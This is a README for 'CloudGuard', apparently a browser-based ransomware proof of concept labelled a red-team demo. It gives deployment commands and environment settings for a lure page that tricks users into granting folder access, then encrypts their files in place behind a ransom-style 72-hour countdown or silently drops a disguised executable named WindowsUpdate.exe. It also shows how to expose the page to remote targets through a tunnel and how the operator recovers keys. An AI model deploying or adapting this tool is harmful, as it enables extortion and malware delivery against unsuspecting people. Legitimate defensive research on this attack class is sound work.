██████╗██╗ ██████╗ ██╗ ██╗██████╗ ██████╗ ██╗ ██╗ █████╗ ██████╗ ██████╗
██╔════╝██║ ██╔═══██╗██║ ██║██╔══██╗██╔════╝ ██║ ██║██╔══██╗██╔══██╗██╔══██╗
██║ ██║ ██║ ██║██║ ██║██║ ██║██║ ███╗██║ ██║███████║██████╔╝██║ ██║
██║ ██║ ██║ ██║██║ ██║██║ ██║██║ ██║██║ ██║██╔══██║██╔══██╗██║ ██║
╚██████╗███████╗╚██████╔╝╚██████╔╝██████╔╝╚██████╔╝╚██████╔╝██║ ██║██║ ██║██████╔╝
╚═════╝╚══════╝ ╚═════╝ ╚═════╝ ╚═════╝ ╚═════╝ ╚═════╝ ╚═╝ ╚═╝╚═╝ ╚═╝╚═════╝
Browser-based file system abuse via the File System Access API. Red-team demonstration. Chromium only. No software installation, no exploits, pure permission social engineering.
┌─────────────────────────────────────────────────────────────┐
│ TARGET │
│ │
│ visits lure page -> clicks "Start Deep Scan" │
│ | │
│ v │
│ browser asks: "Allow access to Documents?" │
│ | │
│ v │
│ [ALLOW] -> scanner animation -> files processed │
│ | │
│ v │
│ alert screen shown │
│ 72h countdown + Case ID │
└─────────────────────────────────────────────────────────────┘
|
POST /api/session (AES key)
|
┌─────────────────────────────────────────────────────────────┐
│ OPERATOR │
│ │
│ GET /api/admin -> session log + master key │
│ opens /decrypt -> enters token -> selects folder │
│ | │
│ v │
│ files restored │
└─────────────────────────────────────────────────────────────┘
Key design: AES-256 key lives server-side only. Target cannot self-recover.
| Mode | Behavior | Use Case |
|---|---|---|
lock (default) |
AES-256-GCM encrypt files in place, show alert screen | File encryption demo |
drop |
Fake scan (always clean), silently write file to folder | Payload delivery demo |
npm install
# Lock mode
PORT=7654 ADMIN_TOKEN=StrongSecret node server.js
# Drop mode
PORT=7654 MODE=drop \
PAYLOAD_FILE=/path/to/update.exe \
PAYLOAD_FILENAME=WindowsUpdate.exe \
ADMIN_TOKEN=StrongSecret \
node server.jsExpose via Cloudflare Tunnel (required for HTTPS on remote targets):
cloudflared tunnel --url http://localhost:7654 --no-autoupdate| Variable | Default | Description |
|---|---|---|
PORT |
3000 |
HTTP port |
ADMIN_TOKEN |
123123 |
Recovery console password |
MODE |
lock |
lock or drop |
PAYLOAD_FILE |
- | Binary to drop (EXE, DLL...) |
PAYLOAD_FILENAME |
WindowsUpdate.bat |
Filename written to disk |
PAYLOAD_CONTENT |
BAT stub | Inline text fallback |
| Method | Path | Auth | Description |
|---|---|---|---|
GET |
/ |
- | Lure page |
GET |
/decrypt |
- | Recovery console |
GET |
/api/config |
- | Active mode + payload config |
POST |
/api/session |
- | Register session, return AES key |
GET |
/api/admin |
X-Admin-Token header |
Master key + session log |
browser-ransomware-poc/
|-- server.js Express server (key mgmt, session registry)
|-- public/
| |-- index.html Lure page (target-facing)
| `-- decrypt.html Recovery console (operator-facing)
|-- master.key AES-256 master key (auto-generated, gitignored)
|-- sessions.json Session log (gitignored)
`-- package.json
- Node.js 18+
- Chrome / Edge / Opera (Firefox and Safari block
showDirectoryPicker) cloudflaredfor HTTPS tunnel (optional but recommended)
| Finding | Severity | Status |
|---|---|---|
| Admin token exposed in URL | High | Fixed: header-only (X-Admin-Token) |
No input validation on /api/session |
Medium | Fixed: bounds + sanitize |
| Missing security headers | Medium | Fixed |
| Timing-unsafe token comparison | Low | Fixed: timingSafeEqual |
| Weak default token | Low | Warned at startup |
| Key file permissions | Low | Fixed: chmod 600 |
- Chromium only (
showDirectoryPickernot in Firefox / Safari) - Single master key per deployment
- HTTPS required for
showDirectoryPickeron non-localhost origins - No rate limiting or DoS protection
- Check Point Research (2026) - Original research on browser-based file system abuse via the File System Access API
- Web Crypto API / File System Access API - W3C / WHATWG specifications
- GSAP - GreenSock Animation Platform
- Plus Jakarta Sans / IBM Plex Mono - Google Fonts
Authorized red-team and educational use only.
